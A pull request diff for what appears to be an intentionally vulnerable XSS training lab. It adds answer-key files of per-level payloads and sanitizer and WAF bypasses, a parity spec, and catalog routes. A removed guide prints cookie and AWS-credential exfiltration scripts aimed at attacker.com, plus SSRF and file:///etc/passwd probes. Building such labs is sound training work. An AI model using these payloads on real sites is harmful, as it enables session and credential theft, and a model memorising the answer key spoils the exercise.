### PR TITLE
feat: serve solutions/ as a compile-time answer key with catalog parity

### DIFF
--- a/.dockerignore
+++ b/.dockerignore
@@ -19,8 +19,11 @@ CHANGELOG.md
 
 # Tests & docs
 spec/
-solutions/
 images/
+
+# NB: solutions/ is intentionally NOT ignored — src/solutions.cr embeds it at
+# compile time (read_file), and COPY . . runs before `shards build`, so the
+# directory must be present in the build context.
 
 # Docker itself
 Dockerfile

--- a/solutions/README.md
+++ b/solutions/README.md
@@ -113,6 +113,7 @@ working payload for one or more maze levels.
 | [hidden](hidden.md) | Reflection in hidden / non-visible sinks: `<input type=hidden>`, meta refresh, data attributes, JSON/CSS/noscript blocks. |
 | [history-state](history-state.md) | DOM sinks where `?seed` is stored via `history.replaceState` and then read back into `innerHTML` / `srcdoc`. |
 | [hpp](hpp.md) | HTTP parameter pollution: duplicate names, array suffixes, and dot-notation reflections. |
+| [html5-sanitizer](html5-sanitizer.md) | Historic CVE-style sanitizer bypasses via iframe `srcdoc` re-parse, entity-encoded handlers, single-pass tag-strip splicing, and JS template-literal interpolation. |
 | [htmlunsafe](htmlunsafe.md) | The 2024 native unsafe HTML-parsing sinks (`Element.setHTMLUnsafe` / `Document.parseHTMLUnsafe` / `ShadowRoot.setHTMLUnsafe`) fed from hash / query / reflected / fetch sources. |
 | [import-map](import-map.md) | Reflection into `<script type="importmap">` JSON or dynamic `import()` specifier. A user-controlled module URL can return JS that the browser executes. |
 | [inattr](inattr.md) | Reflection inside a `<div class>` attribute under various quoting and filter combinations. |
@@ -214,9 +215,11 @@ working payload for one or more maze levels.
 | [unicode](unicode.md) | Unicode normalization / charset / null-byte / backslash quirks in filters. |
 | [url-param-ctx](url-param-ctx.md) | Reflection inside URL query parameter values placed in href/src/action attributes; break out of the attribute. |
 | [waf-bypass](waf-bypass.md) | Classic WAF bypass filters: keyword strip, event strip, quote escape, single-side angle strip, lowercase, equals strip. |
+| [waf-facade](waf-facade.md) | Branded WAF/CDN block-page facades (Cloudflare/AWS/ModSecurity/Akamai/F5/Incapsula) whose protection is cosmetic, mis-scoped, or blind to the real sink. |
 | [wafv2](wafv2.md) | Round-2 WAF-style filter bypasses (keyword strip, event-handler strip, function name strip, length cap, partial tag strip, mixed filters). |
 | [websocket](websocket.md) | WebSocket-style message handlers that consume user input into innerHTML, JSON parse, eval, attribute setters, or stream-message bootstraps. |
 | [whitespace](whitespace.md) | Whitespace-normalizing filters; pick delimiters that survive. |
 | [worker](worker.md) | Web Worker relays: payload travels through the worker boundary and the page innerHTMLs the worker's response. |
 | [wrappercontext](wrappercontext.md) | Plain reflections wrapped in inline formatting tags; no filtering. |
 | [xmlctx](xmlctx.md) | XML/XHTML-shaped pages served as text/html; deprecated container elements and PI. |
+| [xsleak](xsleak.md) | Cross-site-leak oracles (non-XSS controls): body-size, frame-count, image load/error, timing, and redirect-chain state differences. |

--- a/solutions/apidom.md
+++ b/solutions/apidom.md
@@ -13,6 +13,7 @@ All levels use the same payload `<img src=x onerror=alert(1)>` in `q`.
 
 `/apidom/level1/?q=%3Cimg%20src=x%20onerror=alert(1)%3E`
 
+- payload: `<img src=x onerror=alert(1)>`
 - context: `fetch(api).then(r => r.text())` → `out.innerHTML = t`. API echoes
   `q` as `text/plain`.
 
@@ -20,6 +21,7 @@ All levels use the same payload `<img src=x onerror=alert(1)>` in `q`.
 
 `/apidom/level2/?q=%3Cimg%20src=x%20onerror=alert(1)%3E`
 
+- payload: `<img src=x onerror=alert(1)>`
 - context: `fetch(api).then(r => r.json())` → `card.innerHTML = d.html`. API
   returns `{"html": q}` as `application/json`.
 
@@ -27,6 +29,7 @@ All levels use the same payload `<img src=x onerror=alert(1)>` in `q`.
 
 `/apidom/level3/?q=%3Cimg%20src=x%20onerror=alert(1)%3E`
 
+- payload: `<img src=x onerror=alert(1)>`
 - context: `XMLHttpRequest` GET → `out.innerHTML = xhr.responseText`. API echoes
   `q` inside a `<span>`.
 
@@ -34,6 +37,7 @@ All levels use the same payload `<img src=x onerror=alert(1)>` in `q`.
 
 `/apidom/level4/?q=%3Cimg%20src=x%20onerror=alert(1)%3E`
 
+- payload: `<img src=x onerror=alert(1)>`
 - context: `fetch(api).then(r => r.json())` → `feed.insertAdjacentHTML('beforeend',
   '<li>' + d.msg + '</li>')`. API returns `{"msg": q}`.
 
@@ -41,6 +45,7 @@ All levels use the same payload `<img src=x onerror=alert(1)>` in `q`.
 
 `/apidom/level5/?q=%3Cimg%20src=x%20onerror=alert(1)%3E`
 
+- payload: `<img src=x onerror=alert(1)>`
 - context: `fetch(api).then(r => r.text())` → `document.write(t)`. API echoes a
   `<div>` wrapping `q`.
 
@@ -48,5 +53,6 @@ All levels use the same payload `<img src=x onerror=alert(1)>` in `q`.
 
 `/apidom/level6/?q=%3Cimg%20src=x%20onerror=alert(1)%3E`
 
+- payload: `<img src=x onerror=alert(1)>`
 - context: `fetch(api).then(r => r.text())` → `createContextualFragment(t)` →
   `out.appendChild(frag)`. API echoes a `<section>` wrapping `q`.

--- a/solutions/filterchain.md
+++ b/solutions/filterchain.md
@@ -32,17 +32,10 @@ Multiple stacked filters (tag blacklist, event-handler regex, protocol strip, lo
 
 ### filterchain-level5
 
-`/filterchain/level5/?query=%20onmouseover=alert%601%60%20x=`
-
-- payload: ` onmouseover=alert\`1\` x=`
-- context: angles/parens/backticks stripped — actually backticks stripped too, so use attribute breakout with quote: `" onmouseover=confirm\`1\` x="` won't work without parens/backticks. Use `" autofocus onfocus=alert\`1\` x="` — backtick blocked. Alternative: `" onclick=alert(1) x="` — parens blocked. Use throw-without-parens:
-
-### filterchain-level5 (working)
-
-`/filterchain/level5/?query=%22%20onmouseover=alert%26%23x28;1%26%23x29;%20x=%22`
+`/filterchain/level5/?query=%22%20onmouseover=alert%26%23x28%3B1%26%23x29%3B%20x=%22`
 
 - payload: `" onmouseover=alert&#x28;1&#x29; x="`
-- context: parens/backticks/angles stripped; entity-encoded parens decode at parse time in attribute
+- context: reflection in `<div class="…">`; angles/parens/backticks stripped but quotes survive — break out with `"` and use entity-encoded parens, which decode in the attribute value at parse time (fires on mouseover)
 
 ### filterchain-level6
 

--- a/solutions/headless.md
+++ b/solutions/headless.md
@@ -1,379 +1,54 @@
-# Headless Generator XSS - Solutions Guide
-
-This document provides solutions and exploitation techniques for the Headless PDF/Image Generator vulnerability levels. These scenarios simulate backend services that convert HTML/SVG to PDF/PNG using headless browsers (Puppeteer, Playwright, Headless Chrome).
-
-## Overview
-
-Headless browser vulnerabilities occur when:
-- Backend services render user-supplied HTML/SVG
-- JavaScript executes in a server-side browser context
-- Resources are fetched from user-controlled URLs (SSRF)
-- Content-Type validation can be bypassed
-
-## Level 1: Basic HTML to PDF - No Filtering
-
-**Endpoint:** `POST /headless-generator/level1/`
+# headless — solutions
 
-**Vulnerability:** Direct HTML reflection without any sanitization
+Headless browser PDF/Image generator simulated sinks: raw HTML/SVG rendering,
+basic tag filtering bypass, SSRF resource loading, and JS callback logging. All
+levels are POST endpoints whose response body reflects the submitted markup, so
+the "rendered" preview is itself the sink.
 
-**Solution:**
-```html
-<script>alert(1)</script>
-```
+### headless-generator-level1
 
-**Alternative payloads:**
-```html
-<img src=x onerror=alert(1)>
-<svg onload=alert(1)>
-<body onload=alert(1)>
-<iframe srcdoc="<script>alert(1)</script>">
-```
+`[POST] /headless-generator/level1/`
 
-**Real-world impact:** In production, this would execute JavaScript in the headless browser context, potentially allowing:
-- Server-side request forgery (SSRF)
-- Local file access via `file://` protocol
-- Reading internal network resources
-- Credential theft from environment variables
+- payload: `<script>alert(1)</script>`
+- body: `html=<script>alert(1)</script>`
+- context: `html` field reflected raw into the rendered-content div; no filter
 
----
-
-## Level 2: SVG to PNG - No Filtering
-
-**Endpoint:** `POST /headless-generator/level2/`
-
-**Vulnerability:** SVG rendering without script tag filtering
-
-**Solution:**
-```xml
-<svg xmlns="http://www.w3.org/2000/svg">
-  <script>alert(1)</script>
-</svg>
-```
-
-**Alternative payloads:**
-```xml
-<!-- Using foreignObject to embed HTML -->
-<svg xmlns="http://www.w3.org/2000/svg">
-  <foreignObject width="100" height="100">
-    <body xmlns="http://www.w3.org/1999/xhtml">
-      <script>alert(1)</script>
-    </body>
-  </foreignObject>
-</svg>
-
-<!-- Using animate with JavaScript -->
-<svg xmlns="http://www.w3.org/2000/svg">
-  <animate attributeName="x" values="0" onbegin="alert(1)"/>
-</svg>
-```
-
-**Real-world impact:** SVG files are commonly uploaded for logo/icon generation. Malicious SVG can:
-- Execute JavaScript during server-side rendering
-- Make HTTP requests to exfiltrate data
-- Access local resources if file:// protocol is allowed
-
----
-
-## Level 3: HTML Sanitization with Bypass
-
-**Endpoint:** `POST /headless-generator/level3/`
-
-**Vulnerability:** Only removes `<script>` tags (case-insensitive), but misses other vectors
-
-**Solution (Event handlers):**
-```html
-<img src=x onerror=alert(1)>
-<body onload=alert(1)>
-<svg onload=alert(1)>
-```
-
-**Solution (iframe srcdoc):**
-```html
-<iframe srcdoc="<img src=x onerror=alert(1)>">
-```
-
-**Solution (object/embed tags):**
-```html
-<object data="javascript:alert(1)">
-<embed src="javascript:alert(1)">
-```
-
-**Solution (form action):**
-```html
-<form action="javascript:alert(1)"><input type="submit"></form>
-```
-
-**Real-world lessons:**
-- Blacklist-based filtering is insufficient
-- Many HTML elements can execute JavaScript
-- Use comprehensive HTML sanitization libraries
-- Prefer allow-lists over deny-lists
-
----
-
-## Level 4: SSRF via Resource Loading
-
-**Endpoint:** `POST /headless-generator/level4/`
-
-**Vulnerability:** Headless browser fetches external resources during rendering
-
-**Solution (AWS metadata):**
-```html
-<img src="http://169.254.169.254/latest/meta-data/iam/security-credentials/">
-```
-
-**Solution (Local file access):**
-```html
-<img src="file:///etc/passwd">
-<link rel="stylesheet" href="file:///etc/hosts">
-```
-
-**Solution (Internal network scan):**
-```html
-<img src="http://192.168.1.1:8080/admin">
-<img src="http://10.0.0.1:6379/">
-```
-
-**Solution (DNS exfiltration):**
-```html
-<img src="http://stolen-data.attacker.com/">
-<script src="http://exfil.attacker.com/data.js"></script>
-```
-
-**Real-world impact:**
-- Access cloud metadata services (AWS, GCP, Azure)
-- Scan internal networks
-- Read local files if file:// is allowed
-- Port scanning internal services
-- Bypass IP-based authentication
-
-**Mitigation:**
-- Disable or restrict network access in headless browser
-- Block private IP ranges (RFC 1918)
-- Disable file:// protocol
-- Use allowlists for external domains
-
----
-
-## Level 5: JavaScript Callback Simulation
-
-**Endpoint:** `POST /headless-generator/level5/`
-
-**Vulnerability:** Detects JavaScript execution and logs callback URLs (simulates out-of-band XSS)
-
-**Solution (fetch API):**
-```html
-<script>
-fetch('http://attacker.com/log?data=' + document.cookie);
-</script>
-```
-
-**Solution (XMLHttpRequest):**
-```html
-<script>
-var xhr = new XMLHttpRequest();
-xhr.open('GET', 'http://attacker.com/log');
-xhr.send();
-</script>
-```
-
-**Solution (Image beacon):**
-```html
-<script>
-new Image().src = 'http://attacker.com/beacon?cookie=' + document.cookie;
-</script>
-```
-
-**Solution (WebSocket):**
-```html
-<script>
-var ws = new WebSocket('ws://attacker.com/');
-ws.send(document.cookie);
-</script>
-```
-
-**Checking your callback:**
-Visit `/headless-generator/level5/callback/{your-callback-id}` to see logged requests.
-
-**Real-world detection:**
-- Out-of-band XSS detection tools (Burp Collaborator, XSS Hunter)
-- Can detect "blind" XSS in admin panels, PDF generators, etc.
-- JavaScript executes even without visual confirmation
-
----
-
-## Level 6: Content-Type Validation Bypass
-
-**Endpoint:** `POST /headless-generator/level6/`
-
-**Vulnerability:** Accepts JSON but parses both JSON and raw HTML
-
-**Solution (Valid JSON):**
-```bash
-curl -X POST http://localhost:3000/headless-generator/level6/ \
-  -d 'content={"html":"<script>alert(1)</script>"}'
-```
-
-**Solution (Polyglot - both JSON and HTML):**
-```html
-<!--{"html":"--><script>alert(1)</script><!--"}-->
-```
-
-**Solution (Send HTML with JSON Content-Type header):**
-```bash
-curl -X POST http://localhost:3000/headless-generator/level6/ \
-  -H "Content-Type: application/json" \
-  -d '<script>alert(1)</script>'
-```
-
-**Solution (JSON with HTML polyglot):**
-```json
-{"html":"<img src=x onerror=alert(1)>"}
-```
-
-**Real-world bypass techniques:**
-- Content-Type confusion attacks
-- Polyglot payloads (valid in multiple formats)
-- MIME sniffing exploitation
-- Missing X-Content-Type-Options: nosniff
-
----
-
-## Common Exploitation Patterns
-
-### Data Exfiltration
-```html
-<script>
-fetch('http://attacker.com/exfil', {
-  method: 'POST',
-  body: JSON.stringify({
-    cookies: document.cookie,
-    localStorage: Object.entries(localStorage),
-    env: navigator.userAgent
-  })
-});
-</script>
-```
-
-### Reading Local Files (if file:// enabled)
-```html
-<script>
-fetch('file:///etc/passwd')
-  .then(r => r.text())
-  .then(data => {
-    fetch('http://attacker.com/exfil?data=' + btoa(data));
-  });
-</script>
-```
-
-### AWS Metadata Extraction
-```html
-<script>
-fetch('http://169.254.169.254/latest/meta-data/iam/security-credentials/')
-  .then(r => r.text())
-  .then(role => {
-    return fetch('http://169.254.169.254/latest/meta-data/iam/security-credentials/' + role);
-  })
-  .then(r => r.text())
-  .then(creds => {
-    fetch('http://attacker.com/aws-creds', {
-      method: 'POST',
-      body: creds
-    });
-  });
-</script>
-```
-
----
-
-## Defense Strategies
-
-### 1. Sanitization
-- Use robust HTML sanitization libraries (DOMPurify, Bleach)
-- Strip all JavaScript execution vectors
-- Remove dangerous tags: `<script>`, `<object>`, `<embed>`, `<iframe>`
-- Remove event handlers: `onload`, `onerror`, `onclick`, etc.
-
-### 2. Content Security Policy (CSP)
-```html
-Content-Security-Policy: default-src 'none'; img-src 'self'; style-src 'self'
-```
-
-### 3. Network Isolation
-- Run headless browser in sandboxed environment
-- Block private IP ranges (10.0.0.0/8, 172.16.0.0/12, 192.168.0.0/16)
-- Disable file:// protocol access
-- Use allowlists for external domains
-
-### 4. Browser Configuration
-```javascript
-// Puppeteer example
-const browser = await puppeteer.launch({
-  args: [
-    '--no-sandbox',
-    '--disable-setuid-sandbox',
-    '--disable-dev-shm-usage',
-    '--disable-web-security',  // DON'T do this!
-  ]
-});
-
-// Proper configuration
-const browser = await puppeteer.launch({
-  args: [
-    '--no-sandbox',
-    '--disable-setuid-sandbox',
-  ]
-});
-
-// Block requests to private IPs
-await page.setRequestInterception(true);
-page.on('request', (request) => {
-  const url = new URL(request.url());
-  if (isPrivateIP(url.hostname) || url.protocol === 'file:') {
-    request.abort();
-  } else {
-    request.continue();
-  }
-});
-```
-
-### 5. Input Validation
-- Validate and sanitize all user input
-- Limit file sizes
-- Check Content-Type headers
-- Use strict parsing (don't accept malformed input)
-
----
-
-## Testing Tools
-
-### Manual Testing
-```bash
-# Basic XSS test
-curl -X POST http://target/pdf-generator \
-  -d 'html=<script>alert(1)</script>'
-
-# SSRF test
-curl -X POST http://target/pdf-generator \
-  -d 'html=<img src="http://169.254.169.254/latest/meta-data">'
-
-# Out-of-band callback
-curl -X POST http://target/pdf-generator \
-  -d 'html=<script>fetch("http://burpcollaborator.net/")</script>'
-```
-
-### Automated Scanners
-- **Burp Suite** - Professional web scanner with Collaborator for OOB detection
-- **XSS Hunter** - Specialized XSS detection platform
-- **Nuclei** - Template-based vulnerability scanner
-- **Dalfox** - XSS parameter analysis and exploitation tool
-
----
-
-## References
-
-- [OWASP HTML Sanitizer](https://owasp.org/www-project-java-html-sanitizer/)
-- [Content Security Policy Reference](https://content-security-policy.com/)
-- [SSRF Bible](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Request%20Forgery)
-- [Puppeteer Security Best Practices](https://github.com/puppeteer/puppeteer/blob/main/docs/api.md)
-- [PortSwigger Web Security Academy - XSS](https://portswigger.net/web-security/cross-site-scripting)
+### headless-generator-level2
+
+`[POST] /headless-generator/level2/`
+
+- payload: `<svg onload=alert(1)>`
+- body: `svg=<svg onload=alert(1)>`
+- context: `svg` field reflected raw; `<svg onload>` executes on render
+
+### headless-generator-level3
+
+`[POST] /headless-generator/level3/`
+
+- payload: `<img src=x onerror=alert(1)>`
+- body: `html=<img src=x onerror=alert(1)>`
+- context: sanitizer only strips `<script>…</script>` (regex); an event-handler tag slips past
+
+### headless-generator-level4
+
+`[POST] /headless-generator/level4/`
+
+- payload: `<img src=x onerror=alert(1)>`
+- body: `html=<img src=x onerror=alert(1)>`
+- context: SSRF-themed level still reflects `html` raw; `onerror` fires and the `src` is also listed as a fetched resource
+
+### headless-generator-level5
+
+`[POST] /headless-generator/level5/`
+
+- payload: `<img src=x onerror=alert(1)>`
+- body: `html=<img src=x onerror=alert(1)>`
+- context: `html` reflected raw beside the JS-execution detector; `callback_id` is optional
+
+### headless-generator-level6
+
+`[POST] /headless-generator/level6/`
+
+- payload: `<img src=x onerror=alert(1)>`
+- body: `content={"html":"<img src=x onerror=alert(1)>"}` (Content-Type: application/json)
+- context: server parses the JSON `content`, then reflects its `html` field raw (raw non-JSON body is reflected too)

--- a/solutions/html5-sanitizer.md
+++ b/solutions/html5-sanitizer.md
@@ -1,0 +1,63 @@
+# html5-sanitizer — solutions
+
+Historic CVE-style sanitizer bypasses. The reliable modern vector across these
+levels is `<iframe srcdoc="…">`: the outer parser entity-decodes the `srcdoc`
+attribute *value*, so an event handler hidden as `on&#101;rror` survives a
+handler-stripping filter and only becomes `onerror` when the iframe re-parses
+its document. Levels without an iframe/handler filter take a plain event tag.
+
+### html5-sanitizer-level1
+
+`/html5-sanitizer/level1/?query=%3Ciframe%20srcdoc=%22%3Cimg%20src=x%20on%26%23101%3Brror=alert(1)%3E%22%3E`
+
+- payload: `<iframe srcdoc="<img src=x on&#101;rror=alert(1)>">`
+- context: strips `<script>`, plain `<iframe>`, `<object>` and `on\w+=`; an iframe carrying `srcdoc` dodges the srcdoc-negative-lookahead iframe rule, and `on&#101;rror` slips the handler strip then decodes on re-parse
+
+### html5-sanitizer-level2
+
+`/html5-sanitizer/level2/?query=%3Ciframe%20srcdoc=%22%3Cimg%20src=x%20on%26%23101%3Brror=alert(1)%3E%22%3E`
+
+- payload: `<iframe srcdoc="<img src=x on&#101;rror=alert(1)>">`
+- context: strips `script`/`javascript:`/`on\w+=` but never touches `<iframe>`; the entity-encoded handler inside `srcdoc` survives and decodes when the frame parses
+
+### html5-sanitizer-level3
+
+`/html5-sanitizer/level3/?query=%3Cifra%3Ciframe%3Eme%20srcdoc=%22%3Cimg%20src=x%20on%26%23101%3Brror=alert(1)%3E%22%3E`
+
+- payload: `<ifra<iframe>me srcdoc="<img src=x on&#101;rror=alert(1)>">`
+- context: single-pass `strip_tags` removes the inner `<iframe>`, whose deletion splices the halves into a real `<iframe srcdoc>`; `on&#101;rror` survives the handler strip and decodes on re-parse
+
+### html5-sanitizer-level4
+
+`/html5-sanitizer/level4/?query=%24%7Balert(1)%7D`
+
+- payload: `${alert(1)}`
+- context: the sanitized value is interpolated into a JS template literal (backtick string) before it ever reaches innerHTML — a `${…}` substitution executes when the literal is evaluated, needing no tag or handler
+
+### html5-sanitizer-level5
+
+`/html5-sanitizer/level5/?query=%3Cimg%20src=x%20onerror=alert(1)%3E`
+
+- payload: `<img src=x onerror=alert(1)>`
+- context: only `script` and `javascript:` are stripped — no handler filter — so a plain `onerror` tag reflects into the body intact
+
+### html5-sanitizer-level6
+
+`/html5-sanitizer/level6/?query=%3Cimg%20src=x%20onerror=alert(1)%3E`
+
+- payload: `<img src=x onerror=alert(1)>`
+- context: strips `<script>`/`<object>` and `javascript:` but leaves `<img>` and its `onerror` handler untouched
+
+### html5-sanitizer-level7
+
+`/html5-sanitizer/level7/?query=%3Cimg%20src=x%20onerror=alert(1)%3E`
+
+- payload: `<img src=x onerror=alert(1)>`
+- context: strips only `data:` and `script`; a non-`script` event-handler tag reflects raw into the body
+
+### html5-sanitizer-level8
+
+`/html5-sanitizer/level8/?query=%3Ciframe%20srcdoc=%22%3Cimg%20src=x%20on%26%23101%3Brror=alert(1)%3E%22%3E`
+
+- payload: `<iframe srcdoc="<img src=x on&#101;rror=alert(1)>">`
+- context: strips `<script>` and `on\w+=` but keeps `<iframe>`; the entity-encoded handler in `srcdoc` survives and decodes when the frame parses

--- a/solutions/waf-facade.md
+++ b/solutions/waf-facade.md
@@ -1,0 +1,63 @@
+# waf-facade — solutions
+
+Pages dressed up to look like they sit behind a commercial WAF/CDN — branded
+block pages, ray/incident IDs, "protected by" chrome — yet each protection is
+cosmetic, mis-scoped, or blind to the real sink. Every level is still
+exploitable; the note records the real-world evasion class.
+
+### waf-facade-level1
+
+`/waf-facade/level1/?query=%3Cscript%3Ealert(1)%3C/script%3E`
+
+- payload: `<script>alert(1)</script>`
+- context: the normal page escapes its reflection, but the Cloudflare-style 403 block page echoes the *blocked* value raw into `Blocked request: …` — the block page is the sink
+
+### waf-facade-level2
+
+`/waf-facade/level2/?query=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa%3Csvg%20onload=alert(1)%3E`
+
+- payload: `<svg onload=alert(1)>`
+- context: AWS-WAF-style inspection-size cap only scans the first 100 bytes; pad past the window, then the vector reflects raw into the results div
+
+### waf-facade-level3
+
+`/waf-facade/level3/?query=%3Cinput%20autofocus%20onfocus=confirm(1)%3E`
+
+- payload: `<input autofocus onfocus=confirm(1)>`
+- context: ModSecurity/CRS-style anomaly scoring only weights the famous tokens (`script`, `onerror`, `onload`, `alert`, …); `input`/`onfocus`/`confirm` stay under the threshold
+
+### waf-facade-level4
+
+`[Header] /waf-facade/level4/?query=a`
+
+- payload: `<img src=x onerror=alert(1)>`
+- header: `User-Agent: <img src=x onerror=alert(1)>`
+- context: Akamai-style WAF guards `?query` (escaped) but reflects the unscanned User-Agent header raw — a scope gap
+
+### waf-facade-level5
+
+`/waf-facade/level5/?query=%3CSvG%20OnLoad=alert(1)%3E`
+
+- payload: `<SvG OnLoad=alert(1)>`
+- context: F5 ASM-style denylist matches lowercase literals only (`<svg`, `onload=`, …); a case-folded tag walks past it and reflects raw
+
+### waf-facade-level6
+
+`/waf-facade/level6/?query=%27%3Balert(1)//`
+
+- payload: `';alert(1)//`
+- context: Incapsula-style rule set blocks any opening tag, but the reflection lands inside a single-quoted JS string — break the string instead of injecting a tag
+
+### waf-facade-level7
+
+`/waf-facade/level7/?query=%3Cimg%20src=x%20onerror=alert(1)%3E`
+
+- payload: `<img src=x onerror=alert(1)>`
+- context: the "ShieldWall WAF" is client-side theatre; the server already reflected the raw param into `#preview` before the cosmetic JS sanitizer ever runs
+
+### waf-facade-level8
+
+`/waf-facade/level8/?query=%3Cimg%20src=x%20onerror=alert(1)%3E`
+
+- payload: `<img src=x onerror=alert(1)>`
+- context: Cloudflare-style "Just a moment…" JS challenge whose fake verify step innerHTMLs `?query` — the interstitial is a DOM sink

--- a/solutions/xsleak.md
+++ b/solutions/xsleak.md
@@ -1,0 +1,43 @@
+# xsleak — solutions
+
+Cross-site-leak (XS-Leaks) oracles, **not** XSS. Each level exposes a
+guest-vs-admin state difference an attacker could probe cross-origin (response
+size, frame count, image load/error, timing, redirect-chain length). They carry
+`vuln.class = "non-xss-control"` / `vuln.exploitable = false` in `/map/json`:
+there is no injection sink, so a scanner reporting **no XSS** here is correct.
+Sign in first via `/xsleak/login?as=admin` to observe the admin branch.
+
+### xsleak-level1
+
+`/xsleak/search?q=admin`
+
+- payload: `q=admin` (no XSS — control)
+- context: body-size oracle; admin returns ~60 results plus hidden filler, guest ~6 — the response length leaks the role. No sink to inject.
+
+### xsleak-level2
+
+`/xsleak/frame?q=admin`
+
+- payload: `q=admin` (no XSS — control)
+- context: frame-count oracle; admin embeds 12 subframes, guest 1 — `window.frames.length` leaks the role cross-origin. No sink to inject.
+
+### xsleak-level3
+
+`/xsleak/avatar.gif?q=admin`
+
+- payload: `q=admin` (no XSS — control)
+- context: image load/error oracle; admin gets a valid GIF (onload), guest a 404 (onerror). No sink to inject.
+
+### xsleak-level4
+
+`/xsleak/timing?q=admin`
+
+- payload: `q=admin` (no XSS — control)
+- context: response-timing oracle; the guest branch sleeps ~250ms, admin ~10ms — measurable cross-origin. No sink to inject.
+
+### xsleak-level5
+
+`/xsleak/redirect?q=admin`
+
+- payload: `q=admin` (no XSS — control)
+- context: redirect-chain-length oracle; admin follows 5 hops, guest 1 — observable via fetch/redirect counting. No sink to inject.

--- a/spec/solutions_spec.cr
+++ b/spec/solutions_spec.cr
@@ -1,0 +1,49 @@
+require "./spec_helper"
+
+# The whole point of the answer key is that it never silently drifts from the
+# catalog again. These assertions run both directions of parity — every live
+# maze has a solution, every solution names a live maze — and list the offending
+# names so a failure says exactly what to fix.
+describe "solutions answer key" do
+  live_names = Xssmaze.get.map(&.name).to_set
+  entries = Xssmaze::Solutions.entries
+  entry_names = entries.keys.to_set
+
+  it "has a solution entry for every maze in the catalog" do
+    missing = (live_names - entry_names).to_a.sort!
+    unless missing.empty?
+      fail "#{missing.size} maze(s) have no solution entry:\n  #{missing.join("\n  ")}"
+    end
+  end
+
+  it "has no solution entry naming a maze that no longer exists" do
+    orphans = (entry_names - live_names).to_a.sort!
+    unless orphans.empty?
+      fail "#{orphans.size} solution entry/entries name a maze that no longer exists:\n  #{orphans.join("\n  ")}"
+    end
+  end
+
+  it "records a payload and context for every entry" do
+    incomplete = entries.reject { |_, sol| !sol.payload.strip.empty? && !sol.context.strip.empty? }
+      .keys.sort!
+    unless incomplete.empty?
+      fail "#{incomplete.size} entry/entries missing a payload or context:\n  #{incomplete.join("\n  ")}"
+    end
+  end
+
+  it "exposes a markdown page per category, keyed by file stem" do
+    Xssmaze::Solutions.categories.each do |category|
+      Xssmaze::Solutions.markdown(category).should_not be_nil
+    end
+    Xssmaze::Solutions.markdown("does-not-exist").should be_nil
+  end
+
+  it "serves the answer key as JSON keyed by maze name" do
+    parsed = JSON.parse(Xssmaze::Solutions.json_body).as_h
+    parsed.size.should eq(entries.size)
+    sample = parsed["basic-level1"].as_h
+    sample["payload"].as_s.should_not be_empty
+    sample["context"].as_s.should_not be_empty
+    sample["url"].as_s.should_not be_empty
+  end
+end

--- a/src/catalog.cr
+++ b/src/catalog.cr
@@ -1,5 +1,6 @@
 require "json"
 require "digest/sha1"
+require "./solutions"
 
 # Catalog packages every "static" response served from the maze index:
 # the HTML landing page, /map/* views, /sitemap.xml, /version, /stats, etc.
@@ -39,8 +40,11 @@ module Xssmaze::Catalog
   end
 
   # Endpoints the catalog publishes for tooling. Rendered in the page footer.
+  # `/solutions/basic` stands in for the per-category answer key (`/solutions/
+  # <category>`); `/solutions.json` is the whole key keyed by maze name.
   MAP_LINKS = %w[
     /map/text /map/json /map/categories /map/markdown /map/openapi
+    /solutions.json /solutions/basic
     /stats /payloads /random /health /version
   ]
 
@@ -375,6 +379,19 @@ module Xssmaze::Catalog
     end
   end
 
+  # One cached Entry per solution category, keyed by category name. Built the
+  # same way as the flat catalog views so `/solutions/<category>` gets the same
+  # ETag / gzip / 304 treatment — it just needs a dynamic route to select the
+  # category rather than a fixed STATIC_ROUTES row.
+  def self.build_solution_pages : Hash(String, Entry)
+    pages = Hash(String, Entry).new
+    Xssmaze::Solutions.categories.each do |category|
+      body = Xssmaze::Solutions.markdown(category) || ""
+      pages[category] = Entry.new(body, "text/markdown; charset=utf-8")
+    end
+    pages
+  end
+
   # Build every cached static asset in one shot. The key naming maps 1:1
   # to the route table in server.cr so adding a new catalog view is a
   # matter of: add a builder above, add an Entry here, add a route in
@@ -389,20 +406,21 @@ module Xssmaze::Catalog
     version = {version: Xssmaze::VERSION, endpoints: total, categories: groups.size}.to_json
 
     {
-      "index"      => Entry.new(build_index_html(groups, total), "text/html; charset=utf-8"),
-      "map_text"   => Entry.new(build_map_text(mazes), "text/plain; charset=utf-8"),
-      "map_json"   => Entry.new(map_json, "application/json"),
-      "map_md"     => Entry.new(build_map_markdown(mazes), "text/markdown; charset=utf-8"),
-      "categories" => Entry.new(build_categories_json(groups, total), "application/json"),
-      "openapi"    => Entry.new(build_openapi(mazes), "application/json"),
-      "sitemap"    => Entry.new(build_sitemap(mazes), "application/xml; charset=utf-8"),
-      "version"    => Entry.new(version, "application/json"),
-      "stats"      => Entry.new(build_stats(mazes, groups), "application/json"),
-      "payloads"   => Entry.new(PAYLOADS_BODY, "application/json"),
-      "robots"     => Entry.new(ROBOTS_BODY, "text/plain; charset=utf-8", 3600),
-      "css"        => Entry.new(Xssmaze::Assets::INDEX_CSS, "text/css; charset=utf-8", 86400),
-      "js"         => Entry.new(Xssmaze::Assets::INDEX_JS, "application/javascript; charset=utf-8", 86400),
-      "favicon"    => Entry.new(Xssmaze::Assets::FAVICON_SVG, "image/svg+xml; charset=utf-8", 86400),
+      "index"          => Entry.new(build_index_html(groups, total), "text/html; charset=utf-8"),
+      "map_text"       => Entry.new(build_map_text(mazes), "text/plain; charset=utf-8"),
+      "map_json"       => Entry.new(map_json, "application/json"),
+      "map_md"         => Entry.new(build_map_markdown(mazes), "text/markdown; charset=utf-8"),
+      "solutions_json" => Entry.new(Xssmaze::Solutions.json_body, "application/json"),
+      "categories"     => Entry.new(build_categories_json(groups, total), "application/json"),
+      "openapi"        => Entry.new(build_openapi(mazes), "application/json"),
+      "sitemap"        => Entry.new(build_sitemap(mazes), "application/xml; charset=utf-8"),
+      "version"        => Entry.new(version, "application/json"),
+      "stats"          => Entry.new(build_stats(mazes, groups), "application/json"),
+      "payloads"       => Entry.new(PAYLOADS_BODY, "application/json"),
+      "robots"         => Entry.new(ROBOTS_BODY, "text/plain; charset=utf-8", 3600),
+      "css"            => Entry.new(Xssmaze::Assets::INDEX_CSS, "text/css; charset=utf-8", 86400),
